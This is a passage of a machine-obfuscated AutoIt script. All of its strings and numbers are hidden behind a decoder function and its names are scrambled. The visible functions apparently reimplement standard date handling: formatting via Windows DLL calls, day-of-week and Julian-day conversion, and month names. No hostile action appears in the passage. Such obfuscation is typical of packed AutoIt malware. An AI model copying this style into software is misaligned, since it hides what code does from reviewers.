  4715.         Global $a41d801000c = a2b00005424($os[4206]), $a38d8110007 = a2b00005424($os[4207]), $a4fd8214d33 = a2b00005424($os[4208]), $a3cd831143e = a2b00005424($os[4209]), $a23d851205e = a2b00005424($os[4210]), $a3dd8610731 = a2b00005424($os[4211]), $a42d8716321 = a2b00005424($os[4212]), $a00d8811439 = a2b00005424($os[4213]), $a24d8913518 = a2b00005424($os[4214]), $a24d8a12331 = a2b00005424($os[4215]), $a34d8b10845 = a2b00005424($os[4216]), $a56d8c10908 = a2b00005424($os[4217]), $a4cd8d12c50 = a2b00005424($os[4218]), $a02d8e10628 = a2b00005424($os[4219]), $a61d8f10a4e = a2b00005424($os[4220]), $a06e801154d = a2b00005424($os[4221]), $a06e8111958 = a2b00005424($os[4222]), $a2fe8210f3e = a2b00005424($os[4223]), $a15e8312752 = a2b00005424($os[4224]), $a26e8411540 = a2b00005424($os[4225]), $a50e8511c16 = a2b00005424($os[4226]), $a13e8612d3a = a2b00005424($os[4227]), $a60e8715950 = a2b00005424($os[4228]), $a03e8816253 = a2b00005424($os[4229]), $a1fe8914339 = a2b00005424($os[4230]), $a4be8a12327 = a2b00005424($os[4231]), $a4ee8b1583a = a2b00005424($os[4232]), $a53e8c10e08 = a2b00005424($os[4233]), $a09e8d14b42 = a2b00005424($os[4234]), $a01e8e14862 = a2b00005424($os[4235]), $a10e8f13352 = a2b00005424($os[4236]), $a50f8011f1f = a2b00005424($os[4237]), $a57f811500e = a2b00005424($os[4238]), $a3ef8213035 = a2b00005424($os[4239]), $a2bf831432b = a2b00005424($os[4240]), $a32f841400b = a2b00005424($os[4241]), $a41f851164d = a2b00005424($os[4242]), $a35f8613918 = a2b00005424($os[4243]), $a05f8712b06 = a2b00005424($os[4244]), $a39f8810814 = a2b00005424($os[4245]), $a60f8916030 = a2b00005424($os[4246]), $a02f8a12b2d = a2b00005424($os[4247]), $a2ef8b10123 = a2b00005424($os[4248]), $a0af8c10a21 = a2b00005424($os[4249]), $a03f8d13e49 = a2b00005424($os[4250]), $a30f8e1295f = a2b00005424($os[4251]), $a1cf8f11d2c = a2b00005424($os[4252]), $a610901255b = a2b00005424($os[4253]), $a3f09110434 = a2b00005424($os[4254]), $a0409215e63 = a2b00005424($os[4255]), $a5a09312a02 = a2b00005424($os[4256]), $a0809410f56 = a2b00005424($os[4257])
  4716.         Global $a000951493a = a2b00005424($os[4258]), $a1b09611b57 = a2b00005424($os[4259]), $a4e09710b1e = a2b00005424($os[4260]), $a1c09810117 = a2b00005424($os[4261]), $a470991381f = a2b00005424($os[4262]), $a0a09a12c4a = a2b00005424($os[4263]), $a0009b1614d = a2b00005424($os[4264]), $a5309c11505 = a2b00005424($os[4265]), $a5309d11b1e = a2b00005424($os[4266]), $a3d09e15963 = a2b00005424($os[4267]), $a5a09f13b13 = a2b00005424($os[4268]), $a0c19011231 = a2b00005424($os[4269]), $a2819113446 = a2b00005424($os[4270]), $a1a19213e34 = a2b00005424($os[4271]), $a1f1931414d = a2b00005424($os[4272]), $a4d1941535f = a2b00005424($os[4273]), $a4119515e02 = a2b00005424($os[4274]), $a2019612d2e = a2b00005424($os[4275]), $a3619710b56 = a2b00005424($os[4276]), $a2719813552 = a2b00005424($os[4277]), $a3819915010 = a2b00005424($os[4278]), $a1519a10e1f = a2b00005424($os[4279]), $a0719b1083b = a2b00005424($os[4280]), $a2f19c13922 = a2b00005424($os[4281]), $a1119d13058 = a2b00005424($os[4282]), $a1319e13757 = a2b00005424($os[4283]), $a0c19f12060 = a2b00005424($os[4284]), $a5529013146 = a2b00005424($os[4285]), $a1629111522 = a2b00005424($os[4286]), $a012921182f = a2b00005424($os[4287]), $a5329313c1e = a2b00005424($os[4288]), $a0529414a53 = a2b00005424($os[4289]), $a382951530e = a2b00005424($os[4290]), $a092961393a = a2b00005424($os[4291]), $a442971364e = a2b00005424($os[4292]), $a3a29810520 = a2b00005424($os[4293]), $a022991101b = a2b00005424($os[4294]), $a1329a1305a = a2b00005424($os[4295]), $a4a29b1631f = a2b00005424($os[4296]), $a2529c1582e = a2b00005424($os[4297]), $a6329d1031f = a2b00005424($os[4298]), $a3429e13345 = a2b00005424($os[4299]), $a2d29f12b54 = a2b00005424($os[4300]), $a0a39013710 = a2b00005424($os[4301]), $a0f39114c36 = a2b00005424($os[4302]), $a5539211f4f = a2b00005424($os[4303]), $a4639314434 = a2b00005424($os[4304]), $a2539411c50 = a2b00005424($os[4305]), $a5f39514735 = a2b00005424($os[4306]), $a5b39611e15 = a2b00005424($os[4307]), $a2839715b58 = a2b00005424($os[4308]), $a3e39815d34 = a2b00005424($os[4309])
  4717.         Global $a5a39913d0c = a2b00005424($os[4310]), $a3139a12c05 = a2b00005424($os[4311]), $a0c39b15154 = a2b00005424($os[4312]), $a2d39c14021 = a2b00005424($os[4313]), $a1e39d15f61 = a2b00005424($os[4314]), $a4f39e10957 = a2b00005424($os[4315]), $a0139f11d4e = a2b00005424($os[4316]), $a5b4901554d = a2b00005424($os[4317]), $a1e49111d4a = a2b00005424($os[4318]), $a5949213a5d = a2b00005424($os[4319]), $a2949310123 = a2b00005424($os[4320]), $a6349414e11 = a2b00005424($os[4321]), $a1e49514707 = a2b00005424($os[4322]), $a3049610d11 = a2b00005424($os[4323]), $a1b49711653 = a2b00005424($os[4324]), $a5149811837 = a2b00005424($os[4325]), $a3a49915556 = a2b00005424($os[4326]), $a3149a1411d = a2b00005424($os[4327]), $a4149b14a4e = a2b00005424($os[4328]), $a1649c16305 = a2b00005424($os[4329]), $a2549d14e0a = a2b00005424($os[4330]), $a2b49e15b55 = a2b00005424($os[4331]), $a0349f10f37 = a2b00005424($os[4332]), $a635901100d = a2b00005424($os[4333]), $a2559111359 = a2b00005424($os[4334]), $a1659215203 = a2b00005424($os[4335]), $a585931583c = a2b00005424($os[4336]), $a4259414225 = a2b00005424($os[4337]), $a4059516237 = a2b00005424($os[4338]), $a0b59613d20 = a2b00005424($os[4339]), $a505971451b = a2b00005424($os[4340]), $a0f59810e10 = a2b00005424($os[4341]), $a3359910d02 = a2b00005424($os[4342])
  4718.         Global $ssa3501001038 = 1
  4719.     EndIf
  4720.     Local $a5ea6213a32[Number($a5e68310218)], $a33a6015e4e[Number($a0468415316)]
  4721.     Local $a3468515f19 = "", $a5768613348 = ""
  4722.     Local $a2e6871292f, $a2f6881402c, $a0d6891413b
  4723.     If NOT a3cf0800a58($a5396f10f24) Then
  4724.         Return SetError(Number($a3a68a11e47), Number($a3868b11836), "")
  4725.     EndIf
  4726.     If $a4896d15e31 < Number($a3a68c1601f) OR $a4896d15e31 > Number($a5268d15e3e) OR NOT IsInt($a4896d15e31) Then
  4727.         Return SetError(Number($a2e68e1431c), Number($a1168f1555f), "")
  4728.     EndIf
  4729.     a2201103e38($a5396f10f24, $a5ea6213a32, $a33a6015e4e)
  4730.     Switch $a4896d15e31
  4731.         Case Number($a2878010630)
  4732.             $a0d6891413b = DllCall($a4d78115209, $a3678211b34, $a4b7831252d, $a637841114b, Number($a5878514941), $a387861260f, Number($a6278713c46), $a4078812807, "", $a0078915a2c, Number($a3f78a14c5a))
  4733.             If NOT @error AND $a0d6891413b[Number($a1078b15f40)] <> Number($a0d78c13f2c) Then
  4734.                 $a3468515f19 = $a0d6891413b[Number($a3778d11232)]
  4735.             Else
  4736.                 $a3468515f19 = $a6378e12435
  4737.             EndIf
  4738.             If $a33a6015e4e[Number($a1d78f10a54)] > Number($a5d88011b07) Then
  4739.                 $a0d6891413b = DllCall($a478811465f, $a3288210117, $a1988310f62, $a5c8841390f, Number($a0e88515b12), $a5b8861003b, Number($a6388716135), $a338881405a, "", $a3f8891455d, Number($a5688a10150))
  4740.                 If NOT @error AND $a0d6891413b[Number($a4c88b11312)] <> Number($a5188c1073f) Then
  4741.                     $a5768613348 = $a0d6891413b[Number($a5d88d11121)]
  4742.                 Else
  4743.                     $a5768613348 = $a2388e15254
  4744.                 EndIf
  4745.             EndIf
  4746.         Case Number($a2388f15d02)
  4747.             $a0d6891413b = DllCall($a189801103d, $a5798112a3a, $a069821321d, $a549831241c, Number($a3698413b12), $a6298514d5d, Number($a2698614552), $a1c98710319, "", $a5498811a33, Number($a5f98910e15))
  4748.             If NOT @error AND $a0d6891413b[Number($a3298a1495b)] <> Number($a2498b1314f) Then
  4749.                 $a3468515f19 = $a0d6891413b[Number($a5298c10b2a)]
  4750.             Else
  4751.                 $a3468515f19 = $a0798d14b35
  4752.             EndIf
  4753.         Case Number($a1d98e13907)
  4754.             $a0d6891413b = DllCall($a0198f1583d, $a26a8012140, $a32a811181f, $a44a8212d59, Number($a32a831264a), $a5ea8411f11, Number($a4ba8513457), $a04a861204d, "", $a1ba8715925, Number($a4ea8815354))
  4755.             If NOT @error AND $a0d6891413b[Number($a2fa8914954)] <> Number($a26a8a13523) Then
  4756.                 $a3468515f19 = $a0d6891413b[Number($a43a8b14752)]
  4757.             Else
  4758.                 $a3468515f19 = $a34a8c1333b
  4759.             EndIf
  4760.         Case Number($a2ba8d11241)
  4761.             If $a33a6015e4e[Number($a4aa8e1093f)] > Number($a02a8f14616) Then
  4762.                 $a0d6891413b = DllCall($a35b8010828, $a4eb811424d, $a00b8210414, $a5db8313029, Number($a25b8414332), $a12b8512d00, Number($a46b861253c), $a13b871193f, "", $a2db8814956, Number($a1cb891174a))
  4763.                 If NOT @error AND $a0d6891413b[Number($a22b8a1152c)] <> Number($a39b8b1072c) Then
  4764.                     $a5768613348 = $a0d6891413b[Number($a18b8c1364e)]
  4765.                 Else
  4766.                     $a5768613348 = $a23b8d12d23
  4767.                 EndIf
  4768.             EndIf
  4769.         Case Number($a1bb8e13f36)
  4770.             If $a33a6015e4e[Number($a3bb8f14038)] > Number($a2dc801254c) Then
  4771.                 $a5768613348 = $a1ac8111139
  4772.             EndIf
  4773.         Case Number($a55c821002b)
  4774.             If $a33a6015e4e[Number($a14c831303d)] > Number($a3ec8412345) Then
  4775.                 $a5768613348 = $a31c8510306
  4776.             EndIf
  4777.     EndSwitch
  4778.     If $a3468515f19 <> "" Then
  4779.         $a0d6891413b = DllCall($a2ec8613010, $a62c8714421, $a1ac8810754, $a2ac8914622, Number($a53c8a13e1a), $a34c8b13c62, Number($a56c8c1352f), $a39c8d13a1d, "", $a34c8e14739, Number($a46c8f14a63))
  4780.         If NOT @error AND $a0d6891413b[Number($a41d801000c)] <> Number($a38d8110007) Then
  4781.             $a3468515f19 = StringReplace($a3468515f19, $a4fd8214d33, $a0d6891413b[Number($a3cd831143e)])
  4782.         EndIf
  4783.         Local $a28d841180b = a1101204c11($a5ea6213a32[Number($a23d851205e)], $a5ea6213a32[Number($a3dd8610731)], $a5ea6213a32[Number($a42d8716321)])
  4784.         $a5ea6213a32[Number($a00d8811439)] = StringRight($a24d8913518 & $a5ea6213a32[Number($a24d8a12331)], Number($a34d8b10845))
  4785.         $a5ea6213a32[Number($a56d8c10908)] = StringRight($a4cd8d12c50 & $a5ea6213a32[Number($a02d8e10628)], Number($a61d8f10a4e))
  4786.         $a3468515f19 = StringReplace($a3468515f19, $a06e801154d, $a06e8111958)
  4787.         $a3468515f19 = StringReplace($a3468515f19, $a2fe8210f3e, $a15e8312752)
  4788.         $a3468515f19 = StringReplace($a3468515f19, $a26e8411540, $a50e8511c16)
  4789.         $a3468515f19 = StringReplace($a3468515f19, $a13e8612d3a, a35f0300454($a28d841180b, Number($a60e8715950)))
  4790.         $a3468515f19 = StringReplace($a3468515f19, $a03e8816253, a35f0300454($a28d841180b, Number($a1fe8914339)))
  4791.         $a3468515f19 = StringReplace($a3468515f19, $a4be8a12327, $a5ea6213a32[Number($a4ee8b1583a)])
  4792.         $a3468515f19 = StringReplace($a3468515f19, $a53e8c10e08, StringReplace(StringLeft($a5ea6213a32[Number($a09e8d14b42)], Number($a01e8e14862)), $a10e8f13352, "") & StringRight($a5ea6213a32[Number($a50f8011f1f)], Number($a57f811500e)))
  4793.         $a3468515f19 = StringReplace($a3468515f19, $a3ef8213035, a1c0150025d($a5ea6213a32[Number($a2bf831432b)], Number($a32f841400b)))
  4794.         $a3468515f19 = StringReplace($a3468515f19, $a41f851164d, a1c0150025d($a5ea6213a32[Number($a35f8613918)], Number($a05f8712b06)))
  4795.         $a3468515f19 = StringReplace($a3468515f19, $a39f8810814, $a5ea6213a32[Number($a60f8916030)])
  4796.         $a3468515f19 = StringReplace($a3468515f19, $a02f8a12b2d, StringReplace(StringLeft($a5ea6213a32[Number($a2ef8b10123)], Number($a0af8c10a21)), $a03f8d13e49, "") & StringRight($a5ea6213a32[Number($a30f8e1295f)], Number($a1cf8f11d2c)))
  4797.         $a3468515f19 = StringReplace($a3468515f19, $a610901255b, $a5ea6213a32[Number($a3f09110434)])
  4798.         $a3468515f19 = StringReplace($a3468515f19, $a0409215e63, StringRight($a5ea6213a32[Number($a5a09312a02)], Number($a0809410f56)))
  4799.     EndIf
  4800.     If $a5768613348 <> "" Then
  4801.         $a0d6891413b = DllCall($a000951493a, $a1b09611b57, $a4e09710b1e, $a1c09810117, Number($a470991381f), $a0a09a12c4a, Number($a0009b1614d), $a5309c11505, "", $a5309d11b1e, Number($a3d09e15963))
  4802.         If NOT @error AND $a0d6891413b[Number($a5a09f13b13)] <> Number($a0c19011231) Then
  4803.             $a2e6871292f = $a0d6891413b[Number($a2819113446)]
  4804.         Else
  4805.             $a2e6871292f = $a1a19213e34
  4806.         EndIf
  4807.         $a0d6891413b = DllCall($a1f1931414d, $a4d1941535f, $a4119515e02, $a2019612d2e, Number($a3619710b56), $a2719813552, Number($a3819915010), $a1519a10e1f, "", $a0719b1083b, Number($a2f19c13922))
  4808.         If NOT @error AND $a0d6891413b[Number($a1119d13058)] <> Number($a1319e13757) Then
  4809.             $a2f6881402c = $a0d6891413b[Number($a0c19f12060)]
  4810.         Else
  4811.             $a2f6881402c = $a5529013146
  4812.         EndIf
  4813.         $a0d6891413b = DllCall($a1629111522, $a012921182f, $a5329313c1e, $a0529414a53, Number($a382951530e), $a092961393a, Number($a442971364e), $a3a29810520, "", $a022991101b, Number($a1329a1305a))
  4814.         If NOT @error AND $a0d6891413b[Number($a4a29b1631f)] <> Number($a2529c1582e) Then
  4815.             $a5768613348 = StringReplace($a5768613348, $a6329d1031f, $a0d6891413b[Number($a3429e13345)])
  4816.         EndIf
  4817.         If StringInStr($a5768613348, $a2d29f12b54) Then
  4818.             If $a33a6015e4e[Number($a0a39013710)] < Number($a0f39114c36) Then
  4819.                 $a5768613348 = StringReplace($a5768613348, $a5539211f4f, $a2e6871292f)
  4820.                 If $a33a6015e4e[Number($a4639314434)] = Number($a2539411c50) Then $a33a6015e4e[Number($a5f39514735)] = Number($a5b39611e15)
  4821.             Else
  4822.                 $a5768613348 = StringReplace($a5768613348, $a2839715b58, $a2f6881402c)
  4823.                 If $a33a6015e4e[Number($a3e39815d34)] > Number($a5a39913d0c) Then $a33a6015e4e[Number($a3139a12c05)] = $a33a6015e4e[Number($a0c39b15154)] - Number($a2d39c14021)
  4824.             EndIf
  4825.         EndIf
  4826.         $a33a6015e4e[Number($a1e39d15f61)] = StringRight($a4f39e10957 & $a33a6015e4e[Number($a0139f11d4e)], Number($a5b4901554d))
  4827.         $a33a6015e4e[Number($a1e49111d4a)] = StringRight($a5949213a5d & $a33a6015e4e[Number($a2949310123)], Number($a6349414e11))
  4828.         $a33a6015e4e[Number($a1e49514707)] = StringRight($a3049610d11 & $a33a6015e4e[Number($a1b49711653)], Number($a5149811837))
  4829.         $a5768613348 = StringReplace($a5768613348, $a3a49915556, StringFormat($a3149a1411d, $a33a6015e4e[Number($a4149b14a4e)]))
  4830.         $a5768613348 = StringReplace($a5768613348, $a1649c16305, StringReplace(StringLeft($a33a6015e4e[Number($a2549d14e0a)], Number($a2b49e15b55)), $a0349f10f37, "") & StringRight($a33a6015e4e[Number($a635901100d)], Number($a2559111359)))
  4831.         $a5768613348 = StringReplace($a5768613348, $a1659215203, StringFormat($a585931583c, $a33a6015e4e[Number($a4259414225)]))
  4832.         $a5768613348 = StringReplace($a5768613348, $a4059516237, StringFormat($a0b59613d20, $a33a6015e4e[Number($a505971451b)]))
  4833.         $a3468515f19 = StringStripWS($a3468515f19 & $a0f59810e10 & $a5768613348, Number($a3359910d02))
  4834.     EndIf
  4835.     Return $a3468515f19
  4836. EndFunc
  4837.  
  4838. Func a2201103e38($a5396f10f24, ByRef $a5ea6213a32, ByRef $a1759a1214c)
  4839.     If NOT IsDeclared("SSA2201103E38") Then
  4840.         Global $a0059b16106 = a2b00005424($os[4343]), $a3e59c1012a = a2b00005424($os[4344]), $a1759d12c42 = a2b00005424($os[4345]), $a3259e10c2d = a2b00005424($os[4346]), $a1159f14845 = a2b00005424($os[4347]), $a616901085f = a2b00005424($os[4348]), $a0d69114c43 = a2b00005424($os[4349]), $a186921143d = a2b00005424($os[4350]), $a1769310a36 = a2b00005424($os[4351]), $a3269413722 = a2b00005424($os[4352]), $a0a6951305c = a2b00005424($os[4353]), $a0969613440 = a2b00005424($os[4354]), $a0869712a4b = a2b00005424($os[4355]), $a1869813138 = a2b00005424($os[4356]), $a2d69913e01 = a2b00005424($os[4357]), $a6369a16048 = a2b00005424($os[4358]), $a2669b10327 = a2b00005424($os[4359]), $a5b69c10805 = a2b00005424($os[4360]), $a4769d12951 = a2b00005424($os[4361])
  4841.         Global $ssa2201103e38 = 1
  4842.     EndIf
  4843.     Local $a27c701420f = StringSplit($a5396f10f24, $a0059b16106)
  4844.     If $a27c701420f[Number($a3e59c1012a)] > Number($a1759d12c42) Then $a5ea6213a32 = StringSplit($a27c701420f[Number($a3259e10c2d)], $a1159f14845)
  4845.     If $a27c701420f[Number($a616901085f)] > Number($a0d69114c43) Then
  4846.         $a1759a1214c = StringSplit($a27c701420f[Number($a186921143d)], $a1769310a36)
  4847.         If UBound($a1759a1214c) < Number($a3269413722) Then ReDim $a1759a1214c[Number($a0a6951305c)]
  4848.     Else
  4849.         Dim $a1759a1214c[Number($a0969613440)]
  4850.     EndIf
  4851.     If UBound($a5ea6213a32) < Number($a0869712a4b) Then ReDim $a5ea6213a32[Number($a1869813138)]
  4852.     For $a3040c14f22 = Number($a2d69913e01) To Number($a6369a16048)
  4853.         If StringIsInt($a5ea6213a32[$a3040c14f22]) Then
  4854.             $a5ea6213a32[$a3040c14f22] = Number($a5ea6213a32[$a3040c14f22])
  4855.         Else
  4856.             $a5ea6213a32[$a3040c14f22] = -Number($a2669b10327)
  4857.         EndIf
  4858.         If StringIsInt($a1759a1214c[$a3040c14f22]) Then
  4859.             $a1759a1214c[$a3040c14f22] = Number($a1759a1214c[$a3040c14f22])
  4860.         Else
  4861.             $a1759a1214c[$a3040c14f22] = Number($a5b69c10805)
  4862.         EndIf
  4863.     Next
  4864.     Return Number($a4769d12951)
  4865. EndFunc
  4866.  
  4867. Func a1101204c11($a4c37114838, $a4069e1164d, $a4b69f11d1e)
  4868.     If NOT IsDeclared("SSA1101204C11") Then
  4869.         Global $a3d79015430 = a2b00005424($os[4362]), $a0e79110043 = a2b00005424($os[4363]), $a2b79215a02 = a2b00005424($os[4364]), $a4179315007 = a2b00005424($os[4365]), $a1679511261 = a2b00005424($os[4366]), $a2c79614d4b = a2b00005424($os[4367]), $a1c7991224d = a2b00005424($os[4368]), $a1d79a11d2e = a2b00005424($os[4369]), $a5779c14c25 = a2b00005424($os[4370]), $a1f79d11536 = a2b00005424($os[4371]), $a3279e12c2e = a2b00005424($os[4372]), $a0d79f11360 = a2b00005424($os[4373]), $a2f89015b58 = a2b00005424($os[4374]), $a1f89114437 = a2b00005424($os[4375]), $a5e8921190b = a2b00005424($os[4376])
  4870.         Global $ssa1101204c11 = 1
  4871.     EndIf
  4872.     If NOT a3cf0800a58($a4c37114838 & $a3d79015430 & $a4069e1164d & $a0e79110043 & $a4b69f11d1e) Then
  4873.         Return SetError(Number($a2b79215a02), Number($a4179315007), "")
  4874.     EndIf
  4875.     Local $a5b7941120b = Int((Number($a1679511261) - $a4069e1164d) / Number($a2c79614d4b))
  4876.     Local $a3c79710b60 = $a4c37114838 - $a5b7941120b
  4877.     Local $a4179811d04 = $a4069e1164d + (Number($a1c7991224d) * $a5b7941120b) - Number($a1d79a11d2e)
  4878.     Local $a1579b14d14 = Mod($a4b69f11d1e + $a3c79710b60 + Int($a3c79710b60 / Number($a5779c14c25)) - Int($a3c79710b60 / Number($a1f79d11536)) + Int($a3c79710b60 / Number($a3279e12c2e)) + Int((Number($a0d79f11360) * $a4179811d04) / Number($a2f89015b58)), Number($a1f89114437))
  4879.     Return ($a1579b14d14 + Number($a5e8921190b))
  4880. EndFunc
  4881.  
  4882. Func a2701302939($a4c37114838, $a4069e1164d, $a4b69f11d1e)
  4883.     If NOT IsDeclared("SSA2701302939") Then
  4884.         Global $a1089410154 = a2b00005424($os[4377]), $a2a8951061d = a2b00005424($os[4378]), $a2889610308 = a2b00005424($os[4379]), $a4689713327 = a2b00005424($os[4380]), $a2a89812515 = a2b00005424($os[4381])
  4885.         Global $ssa2701302939 = 1
  4886.     EndIf
  4887.     Local $a5889313c42 = a1101204c11($a4c37114838, $a4069e1164d, $a4b69f11d1e)
  4888.     If @error Then
  4889.         Return SetError(Number($a1089410154), Number($a2a8951061d), "")
  4890.     EndIf
  4891.     If $a5889313c42 >= Number($a2889610308) Then Return $a5889313c42 - Number($a4689713327)
  4892.     Return Number($a2a89812515)
  4893. EndFunc
  4894.  
  4895. Func a620140274d($a4c37114838, $a4069e1164d, $a4b69f11d1e)
  4896.     If NOT IsDeclared("SSA620140274D") Then
  4897.         Global $a2089910b3e = a2b00005424($os[4382]), $a1f89a1051c = a2b00005424($os[4383]), $a3f89b11911 = a2b00005424($os[4384]), $a1a89c1561c = a2b00005424($os[4385]), $a5289d1073e = a2b00005424($os[4386]), $a2189e13b30 = a2b00005424($os[4387]), $a3a89f11a57 = a2b00005424($os[4388]), $a4299112f5e = a2b00005424($os[4389]), $a139931551b = a2b00005424($os[4390]), $a4499511e14 = a2b00005424($os[4391]), $a4999610e27 = a2b00005424($os[4392]), $a1399714635 = a2b00005424($os[4393]), $a0c99910952 = a2b00005424($os[4394]), $a0099a11e5c = a2b00005424($os[4395]), $a0299b12254 = a2b00005424($os[4396]), $a1499c12244 = a2b00005424($os[4397])
  4898.         Global $ssa620140274d = 1
  4899.     EndIf
  4900.     If NOT a3cf0800a58(StringFormat($a2089910b3e, $a4c37114838, $a4069e1164d, $a4b69f11d1e)) Then
  4901.         Return SetError(Number($a1f89a1051c), Number($a3f89b11911), "")
  4902.     EndIf
  4903.     If $a4069e1164d < Number($a1a89c1561c) Then
  4904.         $a4069e1164d = $a4069e1164d + Number($a5289d1073e)
  4905.         $a4c37114838 = $a4c37114838 - Number($a2189e13b30)
  4906.     EndIf
  4907.     Local $a5b7941120b = Int($a4c37114838 / Number($a3a89f11a57))
  4908.     Local $a0e9901542e = Int($a5b7941120b / Number($a4299112f5e))
  4909.     Local $a2399210645 = Number($a139931551b) - $a5b7941120b + $a0e9901542e
  4910.     Local $a5f99415a22 = Int(Number($a4499511e14) * ($a4c37114838 + Number($a4999610e27)) / Number($a1399714635))
  4911.     Local $a4e9981301e = Int(Number($a0c99910952) * ($a4069e1164d + Number($a0099a11e5c)) / Number($a0299b12254))
  4912.     Local $a0ba6413d49 = $a2399210645 + $a4b69f11d1e + $a5f99415a22 + $a4e9981301e - Number($a1499c12244)
  4913.     Return ($a0ba6413d49)
  4914. EndFunc
  4915.  
  4916. Func a1c0150025d($a4069e1164d, $a3f17c14204 = 0)
  4917.     If NOT IsDeclared("SSA1C0150025D") Then
  4918.         Global $a1d99e13d31 = a2b00005424($os[4398]), $a2199f10724 = a2b00005424($os[4399]), $a5fa901555a = a2b00005424($os[4400]), $a35a9112323 = a2b00005424($os[4401]), $a18a9212a62 = a2b00005424($os[4402]), $a2fa9313b39 = a2b00005424($os[4403]), $a41a9415248 = a2b00005424($os[4404]), $a4ba951280e = a2b00005424($os[4405]), $a33a961490a = a2b00005424($os[4406]), $a2ba9711623 = a2b00005424($os[4407]), $a19a9814f56 = a2b00005424($os[4408]), $a31a9910a4c = a2b00005424($os[4409]), $a35a9a16110 = a2b00005424($os[4410]), $a0ba9c12d10 = a2b00005424($os[4411]), $a59a9d14810 = a2b00005424($os[4412]), $a19a9e1104c = a2b00005424($os[4413]), $a2fa9f15d45 = a2b00005424($os[4414]), $a26b9010243 = a2b00005424($os[4415]), $a48b9111d47 = a2b00005424($os[4416]), $a1eb9211b46 = a2b00005424($os[4417]), $a0db9311403 = a2b00005424($os[4418]), $a23b9410732 = a2b00005424($os[4419]), $a17b9514351 = a2b00005424($os[4420]), $a30b9614a08 = a2b00005424($os[4421]), $a02b971294a = a2b00005424($os[4422]), $a27b9815c4c = a2b00005424($os[4423]), $a06b9911846 = a2b00005424($os[4424]), $a2eb9a1545e = a2b00005424($os[4425]), $a17b9b14125 = a2b00005424($os[4426]), $a4db9c13649 = a2b00005424($os[4427]), $a02b9d15150 = a2b00005424($os[4428]), $a5bb9e14d3e = a2b00005424($os[4429]), $a48b9f13630 = a2b00005424($os[4430]), $a2fc9010e12 = a2b00005424($os[4431]), $a09c9113758 = a2b00005424($os[4432]), $a54c9214a4b = a2b00005424($os[4433])
  4919.         Global $ssa1c0150025d = 1
  4920.     EndIf
  4921.     Local $a3499d12739[Number($a1d99e13d31)] = ["", $a2199f10724, $a5fa901555a, $a35a9112323, $a18a9212a62, $a2fa9313b39, $a41a9415248, $a4ba951280e, $a33a961490a, $a2ba9711623, $a19a9814f56, $a31a9910a4c, $a35a9a16110]
  4922.     Local $a01a9b16134[Number($a0ba9c12d10)] = ["", $a59a9d14810, $a19a9e1104c, $a2fa9f15d45, $a26b9010243, $a48b9111d47, $a1eb9211b46, $a0db9311403, $a23b9410732, $a17b9514351, $a30b9614a08, $a02b971294a, $a27b9815c4c]
  4923.     Select
  4924.         Case NOT StringIsInt($a4069e1164d)
  4925.             Return SetError(Number($a06b9911846), Number($a2eb9a1545e), "")
  4926.         Case $a4069e1164d < Number($a17b9b14125) OR $a4069e1164d > Number($a4db9c13649)
  4927.             Return SetError(Number($a02b9d15150), Number($a5bb9e14d3e), "")
  4928.         Case Else
  4929.             Select
  4930.                 Case $a3f17c14204 = Number($a48b9f13630)
  4931.                     Return $a3499d12739[$a4069e1164d]
  4932.                 Case $a3f17c14204 = Number($a2fc9010e12)
  4933.                     Return $a01a9b16134[$a4069e1164d]
  4934.                 Case Else
  4935.                     Return SetError(Number($a09c9113758), Number($a54c9214a4b), "")
  4936.             EndSelect
  4937.     EndSelect
  4938. EndFunc
  4939.  
  4940. Func a5801604f08($a0ba6413d49, ByRef $a4c37114838, ByRef $a4069e1164d, ByRef $a4b69f11d1e)
  4941.     If NOT IsDeclared("SSA5801604F08") Then
  4942.         Global $a17c931231e = a2b00005424($os[4434]), $a0dc9414231 = a2b00005424($os[4435]), $a13c9511108 = a2b00005424($os[4436]), $a47c961450f = a2b00005424($os[4437]), $a33c981114d = a2b00005424($os[4438]), $a0fc9a13462 = a2b00005424($os[4439]), $a38c9b12d54 = a2b00005424($os[4440]), $a38c9d12709 = a2b00005424($os[4441]), $a28c9e16031 = a2b00005424($os[4442]), $a43c9f13852 = a2b00005424($os[4443]), $a2bd9015e06 = a2b00005424($os[4444]), $a03d911144c = a2b00005424($os[4445]), $a26d9214f5d = a2b00005424($os[4446]), $a2cd9315724 = a2b00005424($os[4447]), $a4ad9411138 = a2b00005424($os[4448]), $a37d9515330 = a2b00005424($os[4449]), $a0bd9613455 = a2b00005424($os[4450]), $a23d9712737 = a2b00005424($os[4451]), $a0ad9811c03 = a2b00005424($os[4452]), $a37d9913b3b = a2b00005424($os[4453]), $a3ad9a12539 = a2b00005424($os[4454]), $a50d9b1362c = a2b00005424($os[4455]), $a60d9c14429 = a2b00005424($os[4456]), $a00d9d14e45 = a2b00005424($os[4457]), $a44d9e14c19 = a2b00005424($os[4458]), $a45d9f13f11 = a2b00005424($os[4459]), $a5ce901532d = a2b00005424($os[4460])
  4943.         Global $ssa5801604f08 = 1
  4944.     EndIf
  4945.     If $a0ba6413d49 < Number($a17c931231e) OR NOT IsNumber($a0ba6413d49) Then
  4946.         Return SetError(Number($a0dc9414231), Number($a13c9511108), Number($a47c961450f))
  4947.     EndIf
  4948.     Local $a42c9714720 = Int($a0ba6413d49 + Number($a33c981114d))
  4949.     Local $a4fc991495d = Int(($a42c9714720 - Number($a0fc9a13462)) / Number($a38c9b12d54))
  4950.     Local $a33c9c11403 = Int($a4fc991495d / Number($a38c9d12709))
  4951.     Local $a5b7941120b = $a42c9714720 + Number($a28c9e16031) + $a4fc991495d - $a33c9c11403
  4952.     Local $a0e9901542e = $a5b7941120b + Number($a43c9f13852)
  4953.     Local $a2399210645 = Int(($a0e9901542e - Number($a2bd9015e06)) / Number($a03d911144c))
  4954.     Local $a1579b14d14 = Int(Number($a26d9214f5d) * $a2399210645)
  4955.     Local $a5f99415a22 = Int(($a0e9901542e - $a1579b14d14) / Number($a2cd9315724))
  4956.     Local $a4e9981301e = Int(Number($a4ad9411138) * $a5f99415a22)
  4957.     $a4b69f11d1e = $a0e9901542e - $a1579b14d14 - $a4e9981301e
  4958.     If $a5f99415a22 - Number($a37d9515330) < Number($a0bd9613455) Then
  4959.         $a4069e1164d = $a5f99415a22 - Number($a23d9712737)
  4960.     Else
  4961.         $a4069e1164d = $a5f99415a22 - Number($a0ad9811c03)
  4962.     EndIf
  4963.     If $a4069e1164d < Number($a37d9913b3b) Then
  4964.         $a4c37114838 = $a2399210645 - Number($a3ad9a12539)
  4965.     Else
  4966.         $a4c37114838 = $a2399210645 - Number($a50d9b1362c)
  4967.     EndIf
